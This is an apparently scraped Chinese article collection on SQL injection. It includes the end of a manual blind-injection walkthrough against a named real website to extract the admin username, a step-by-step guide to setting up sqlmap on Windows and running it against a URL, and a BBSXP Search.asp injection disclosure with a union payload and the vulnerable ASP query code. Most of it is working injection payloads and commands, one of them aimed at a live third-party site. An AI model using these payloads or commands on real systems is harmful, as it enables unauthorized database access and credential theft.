帐号的第一位的第一个字母不是1所以出错.

呵呵`帐号的第一位的第一个字母是a 正确...所以回显正常.

帐号是什么我想都不用怎么想了吧`5位数的admin

确实是的哦....哈哈.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

为了给大家学习.我把例句都提取出来了.和程序过程是一样的,大家可以研究下.

其他的密码等也是这种过程. 大家明白了吗?要难不是很难`只是要有耐心.如果简单的话就不会出现

全自动的注入工具了.

希望大家在使用我的工具的同时也能学到点东西.

篇4：Windows系统如何使用sqlmap脚本安全

使用方法：

需要安装python,不能安装最新版本的python3.2.2只能安装2.6-3.0这些版本，包括2.6,3.0

这里，我提供一个Python的安装包，点击这里下载→ Python2.7

然后下载sqlmap最新版本。点击这里下载→ 官方下载

下载好之后，解压。

在我机子上，我把sqlmap文件夹拷在了E盘

然后打开Python的安装文件

按照以下步骤安装：

好了，完成上面几个步骤，Python的安装就结束了。

下面开始最重要的步骤，一定要仔细看！（下面配图）

右键我的电脑/计算机 → 属性 → 高级系统设置（XP用户可忽略这一步） → 出现 “系统属性“ , 点击环境变量

→ 出现“环境变量” 在下面的“系统变量”里面找到 Path 变量，编辑它（没有找到的话，就点击新建） → 在变量值那里末尾，填上你的Python安装路径

（比如我的是在 D:\Python27\ ，那么我就要填；D:\Python27\ 记住，一定要填上分号；） → 然后确定就OK了，

好了，完成上面一系列的程序，就能运行sqlmap了！

开始 → 运行 → cmd 打开dos窗口

介绍几个dos命令：

想要进入某个磁盘，直接输入盘符+冒号，例如 E:

cd 代表进入某个文件夹

dir 代表列出当前文件夹里的内容

进入sqlmap的文件夹之后，找到 sqlmap.py

最简单的命令是 sqlmap.py -u XXX.com/php?id=123 回车就可以进行sql扫描了。

篇5：BBSXP,很多注入脚本安全

By:sobiny[B.C.T]

提交给BBSXP的漏洞公告，官方一点反映都没呢，。

其实主要是他们一个类型的注入太多了。

我都不好意思发出来，发多了手痛。

哎，举例一个。

Search.asp文件

127.0.0.1/Search.asp?menu=Result&ForumID=1&Keywords=aaaaa&Item=ThreadID&DateComparer=365&SortBy=Desc/**/union&VerifyCode=8149

if Request(”menu“)=”Result“ then

Keywords=HTMLEncode(Request(”Keywords“))

SortBy=HTMLEncode(Request(”SortBy“))

Item=HTMLEncode(Request(”Item“))

if Keywords=”“ then error(”您没有输入任何查询条件！“)

if Request(”VerifyCode“)Session(”VerifyCode“) or Session(”VerifyCode“)=”“ then

error(”验证码错误！“)

SQLSearch=”IsApproved=1 and IsDel=0 and “&Item&” like '%“&Keywords&”%' “

if DateComparer >0 then SQLSearch=SQLSearch&” and

PostTime>“&SqlNowString&”-“&DateComparer&” “

if ForumID >0 then SQLSearch=SQLSearch&” and ForumID=“&ForumID&” “

sql=”select * from [BBSXP_Threads] where “&SQLSearch&” order by ThreadID

“&SortBy&”"

Rs.Open sql,Conn,1

……………………

我汗死，一个语句中，有两个地方可以注入，BBSXP简直太有才了，

。

他们不把这类型的漏洞补了

我还真不准备看了，太多了，BUG。

【sqlmap 注入命令脚本安全】相关文章：

1.自定义sqlmap注入语句进行高级注入脚本安全

2.注入笔记半猜解查询脚本安全

3.手把手叫你SQL注入攻防（PHP语法）脚本安全

10.360webscan 0.1.1.9 XSS防御绕过脚本安全

《sqlmap 注入命令脚本安全.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式

实用文图文推荐

sqlmap 注入命令脚本安全相关文章